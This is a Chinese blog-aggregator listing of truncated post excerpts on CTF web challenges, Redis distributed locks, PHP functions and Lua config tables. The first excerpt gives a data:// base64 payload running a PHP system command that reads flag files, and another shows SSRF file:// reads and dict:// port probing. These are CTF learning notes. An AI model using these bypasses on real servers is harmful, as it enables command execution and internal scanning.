在web37的基础上过滤了php 使用data://text/plain;base64绕过 payload:?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs= PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=即<? ...
分类:
Web程序 时间:
2021-02-03 10:29:01
阅读次数:
0
在之前的项目中分布式锁和限流是基于redis进行的,分布式锁基于setnx和expire命令实现,也可以基于lua脚本实现。限流是采用固定时间窗算法进行的。 最近了解到redisson这个工具类,而且基于其分布式锁的实现是比较常见的,简单研究下其使用。 官网:wiki地址 https://githu ...
分类:
其他好文 时间:
2021-02-02 11:13:05
阅读次数:
0
is_nan () 判断是否为合法数值 bool is_nan ( float $val ) 说明: 如果 val 为"非数值",例如 acos(1.01) 的结果,则返回 TRUE。参数: val 要检查的值返回值: 如果 val 不是一个数字(not a number)返回 TRUE,否则返回 ...
分类:
Web程序 时间:
2021-02-02 10:45:53
阅读次数:
0
https://www.runoob.com/php/php-ref-misc.html eval() 定义和用法 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 注释:return 语句会立即终止对字符串的计算。 提示:该函数对于在数据 ...
分类:
其他好文 时间:
2021-02-02 10:37:24
阅读次数:
0
没有太多头绪,只能打开源码看看 看到源码中有奇怪的两端编码,506F2E和706870 把他们十六进制转化为字符是Po.php 进入该网页是个点,这时候联合图画中的话语 我想到了整个元素周期表 所以,用脚本 import requests import re elements = ['H', 'He ...
分类:
其他好文 时间:
2021-02-01 13:03:06
阅读次数:
0
把配置表格.xlsx数据转为Lua配置表,其实就是把表格数据用Lua写一遍,这里的实现重点就是setmetatable设置元表。 以下以表格student_info.xlsx举例,展示对应Lua配置表内容: 表格内容: student_info.xlsx内容 对应Lua配置表起名为student_i ...
分类:
其他好文 时间:
2021-02-01 12:44:24
阅读次数:
0
内网访问 伪协议读取文件 url=file:///var/www/html/flag.php 端口扫描 通过dict协议用来探测开放的端口 构造payload: ?url=dict://127.0.0.1:端口号 题目说端口在8000-9000 使用Burp的intruder模块进行爆破 然后开始爆 ...
分类:
其他好文 时间:
2021-02-01 12:27:50
阅读次数:
0
<?php /* * @最优整数均分算法 * @param int $number 待平分的数字 * @param int $taotl 平分总个数 */ function getDivideNumber($number, $total) { $divide_number = bcdiv($numb ...
分类:
编程语言 时间:
2021-02-01 11:58:28
阅读次数:
0
error_reporting(0);// 关闭错误报告 session_start();//启动会话 require('./flag.php'); if(!isset($_SESSION['nums'])){//isset() — 检测nums变量是否设置。 $_SESSION['nums'] = ...
分类:
Web程序 时间:
2021-02-01 11:42:42
阅读次数:
0
is_finite () 判断是否为有限值 bool is_finite ( float $val ) 说明: 检查 val 是否是是本机平台上浮点数所允许范围中的一个合法的有限值。参数: val 要检查的值 返回值: 如果 val 是本机平台上 PHP 浮点数所允许范围中的一个合法的有限值,则返回 ...
分类:
Web程序 时间:
2021-01-30 12:17:18
阅读次数:
0
